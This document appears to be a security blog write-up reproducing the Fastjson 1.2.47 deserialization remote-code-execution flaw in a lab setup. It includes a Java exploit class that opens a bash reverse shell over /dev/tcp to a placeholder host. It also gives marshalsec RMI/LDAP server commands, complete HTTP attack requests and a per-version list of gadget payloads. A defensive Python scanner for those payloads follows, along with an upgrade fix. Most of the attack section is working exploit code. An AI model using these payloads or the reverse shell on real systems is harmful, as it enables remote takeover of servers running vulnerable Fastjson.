I. Vulnerability description

Fastjson is an open-source JSON parser developed by Alibaba. It performs well and is widely used in the Java projects of many vendors. Fastjson provides an autoType feature that lets the data being deserialized name its own target type through the "@type" field. In addition, Fastjson's custom deserialization mechanism calls the setter methods, and some of the getter methods, of the specified class. When autoType is enabled and untrusted data is deserialized, an attacker can craft data that steers the target application's execution into a particular setter or getter of a class of their choosing. If that method contains logic that can be abused (commonly called a "Gadget"), serious security problems can result. In Fastjson 1.2.47 and earlier, the class caching mechanism can be used to bypass the check even when autoType is disabled.

II. Affected versions

Fastjson 1.2.47 and earlier versions

III. Experimental environment

Docker:

https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce

```shell
docker-compose up -d
```

Tomcat setup (reply "Fastjson" to the official account to obtain the environment and the EXP)

Place the application under Tomcat/Webapps.

Start Tomcat.

IV. Reproducing the vulnerability

Save the exp below as Exploit.java (the file name must match the public class):

```java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit {
    public Exploit() throws Exception {
        // Windows variant used when debugging locally (pops the calculator).
        //Process p = Runtime.getRuntime().exec(new String[]{"cmd", "/c", "calc.exe"});
        // Linux variant: connects back to the listener; XX.XX.XX.XX:34567 is a placeholder address.
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
                "exec 5<>/dev/tcp/XX.XX.XX.XX/34567; cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while ((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}
```

Compile it to produce Exploit.class:

```shell
javac Exploit.java
```

Start a web server with Python in the directory that holds Exploit.class:

```shell
python -m SimpleHTTPServer 1111
```

With the exp HTTP service running, start the LDAP service (or the RMI service) with marshalsec.

This time the LDAP service is used again, and the corresponding RMI steps were screenshotted as well. The reason is that whether RMI or LDAP works depends on the JDK version of the target environment (pay attention to the JDK version; it is the key to whether the attempt succeeds).

When the JDK version is not supported, the RMI service simply receives the request and closes the connection. Pay attention to this detail.

```shell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://XX.XX.XX.XX:1111/#Exploit" 9999
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://XX.XX.XX.XX:1111/#Exploit" 9999
```

LDAP version: intercept the request and modify the packet

```http
POST /fastjson-1.2.47/ HTTP/1.1
Host: 192.168.0.104:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 275

{"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "b": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://192.168.0.104:9999/exploits", "autoCommit": true}}
```

RMI version

```http
POST /fastjson-1.2.47/ HTTP/1.1
Host: 192.168.0.104:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 274

{"a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "b": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://192.168.0.104:9999/exploits", "autoCommit": true}}
```

The target fetches Exploit.class from the HTTP service

RMI version

Listening for the reverse shell

The shell is obtained

Debugging in IDEA: the calculator pops up

EXP by version:

```text
Fastjson <= 1.2.24
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/exp","autoCommit":true}

Fastjson <= 1.2.41
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1099/exp","autoCommit":true}

Fastjson <= 1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://x.x.x.x:1099/exp","autoCommit":true}

Fastjson <= 1.2.43
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://x.x.x.x:1099/exp","autoCommit":true}

Fastjson <= 1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://x.x.x.x:1099/exp"}}

Fastjson <= 1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/exp","autoCommit":true}}

Fastjson <= 1.2.62
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://x.x.x.x:1099/exp"}

Fastjson <= 1.2.66
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://x.x.x.x:1099/calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://x.x.x.x:1099/calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://x.x.x.x:1099/calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"ldap://x.x.x.x:1099/calc"}}
```
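From the defender's side, the payload shapes listed above share a few stable markers: an "@type" key, the java.lang.Class/"val" pair that primes the cache in 1.2.47, descriptor-style class names ("L...;", "[...") aimed at the 1.2.41 to 1.2.43 checks, and a JNDI URL (rmi:// or ldap://) in a string value. The scanner below is an added example, not part of the original post; it walks a request body as JSON and falls back to regexes for bodies that Fastjson accepts but a strict parser rejects (such as the 1.2.43 variant). The gadget list and the sample bodies are constructed here from the payloads on this page.

```python
import json
import re
# Gadget classes named on this page; a normalized @type is compared against this set.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl", "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
                  "org.apache.xbean.propertyeditor.JndiConverter", "org.apache.shiro.jndi.JndiObjectFactory",
                  "br.com.anteros.dbcp.AnterosDBCPConfig", "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
                  "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig"}
TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]*)"')
JNDI_RE = re.compile(r'\b(?:rmi|ldaps?)://[^"\'\s]+', re.IGNORECASE)

# Constructed request bodies shaped like the payloads above (not captured traffic).
SAMPLES = {
    "1.2.47": '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
              '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/exp"}}',
    "1.2.43": '{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://x.x.x.x:1099/exp"}',
    "benign": '{"user":{"name":"alice","roles":["admin"]},"type":"login"}',
}

def normalize_type(name):
    # Undo the descriptor tricks aimed at the 1.2.41-1.2.43 checks: "Lx;" -> "x", "[x" -> "x".
    name = name.strip()
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name.lstrip("[")

def _walk(node, findings):
    if isinstance(node, dict):
        t = node.get("@type")
        if isinstance(t, str):
            if t == "java.lang.Class" and isinstance(node.get("val"), str):
                findings.add("cache-priming via java.lang.Class: " + node["val"])
            if normalize_type(t) in GADGET_CLASSES:
                findings.add("gadget @type: " + normalize_type(t))
    # Recurse into object values and array elements; flag JNDI URLs in any string leaf.
    for child in (node.values() if isinstance(node, dict) else node if isinstance(node, list) else []):
        _walk(child, findings)
    if isinstance(node, str) and JNDI_RE.search(node):
        findings.add("jndi url: " + JNDI_RE.search(node).group(0))

def scan(body):
    # Strict JSON is walked structurally; bodies that json.loads rejects fall back to regexes.
    findings = set()
    try:
        _walk(json.loads(body), findings)
    except ValueError:
        findings.update("gadget @type: " + normalize_type(t) for t in TYPE_RE.findall(body)
                        if normalize_type(t) in GADGET_CLASSES)
        findings.update("jndi url: " + u for u in JNDI_RE.findall(body))
    return sorted(findings)
```

Run scan() over request bodies from a proxy or WAF log; an empty list means none of the markers were present, and the findings name which marker matched so the alert can be triaged without re-reading the payload.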

V. Vulnerability fix

Upgrade Fastjson to the latest version:

github.com/alibaba/fas…

Note: the Java version used to start the RMI and LDAP services matters. Before starting the services, run `java -version` to check whether your JDK version is lower than the JDK versions shown below.


thelostworld
